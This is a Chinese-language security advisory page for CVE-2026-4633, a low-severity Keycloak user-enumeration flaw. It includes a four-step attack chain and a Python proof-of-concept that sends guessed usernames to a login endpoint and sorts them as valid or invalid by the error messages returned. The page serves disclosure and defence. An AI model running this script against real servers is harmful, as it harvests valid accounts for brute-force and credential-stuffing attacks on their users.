CVE-2026-4633 CVSS 3.7 低危

CVE-2026-4633 Keycloak用户枚举信息泄露漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4633

漏洞类型

信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Keycloak

漏洞概述

Keycloak在启用Organizations并采用身份优先登录流程时存在缺陷。攻击者可利用差异化的错误消息枚举用户，判断用户是否存在，从而导致信息泄露。

技术细节

该漏洞发生在Keycloak的身份验证模块中，特别是在启用Organizations功能后。当用户进行身份优先登录时，系统对于存在的用户和不存在的用户返回了不同的错误提示信息。攻击者无需认证即可向登录接口发送大量请求，通过分析响应内容的差异（例如响应时间、状态码或具体的错误文本），来验证特定用户名是否已在系统中注册。这种漏洞降低了暴力破解攻击的难度，并助长了针对性钓鱼攻击。

攻击链分析

STEP 1

步骤1：侦察阶段

攻击者识别目标系统为Keycloak，并确认其启用了Organizations功能以及使用了身份优先登录流程。

STEP 2

步骤2：探测阶段

攻击者向登录端点发送特制的HTTP POST请求，请求中包含猜测的用户名。

STEP 3

步骤3：差异分析

攻击者接收服务器响应，分析错误消息的具体内容。如果提示“用户不存在”，则用户无效；如果提示“密码错误”或类似凭证问题，则用户有效。

STEP 4

步骤4：信息收集

攻击者记录所有被判定为有效的用户名，建立目标用户列表，为后续的暴力破解或凭证填充攻击做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_user_enumeration(target_url, username_list):
    """
    PoC for CVE-2026-4633: Keycloak User Enumeration
    Checks for differential error messages in identity-first login flow.
    """
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (CVE-Scanner)"
    }

    for username in username_list:
        # Payload simulating identity-first login with Organizations enabled
        payload = {
            "username": username,
            "organizationId": "test-org"
        }
        
        try:
            response = requests.post(target_url, data=payload, headers=headers, timeout=5)
            
            # Analyze response for differential clues
            if "User not found" in response.text or "INVALID_USER" in response.text:
                print(f"[-] User '{username}': Does not exist")
            elif "Invalid password" in response.text or "INVALID_CREDENTIALS" in response.text:
                print(f"[+] User '{username}': EXISTS (Valid user)")
            else:
                print(f"[?] Unknown response for '{username}': Status {response.status_code}")
                
        except Exception as e:
            print(f"[!] Error connecting to {target_url}: {e}")

if __name__ == "__main__":
    target = "https://keycloak.example.com/realms/master/login-actions/authenticate"
    users = ["admin", "test", "root", "genericuser"]
    check_user_enumeration(target, users)

影响范围

未在提供信息中明确指定

防御指南

临时缓解措施

建议管理员暂时禁用Organizations功能或配置统一的错误提示页面，避免泄露用户存在性信息，直到应用官方补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4633
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4633
3 Details https://www.cvedetails.com/cve/CVE-2026-4633/
4 VulDB https://vuldb.com/cve/CVE-2026-4633
5 Link https://access.redhat.com/security/cve/CVE-2026-4633
6 Link https://bugzilla.redhat.com/show_bug.cgi?id=2450247

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表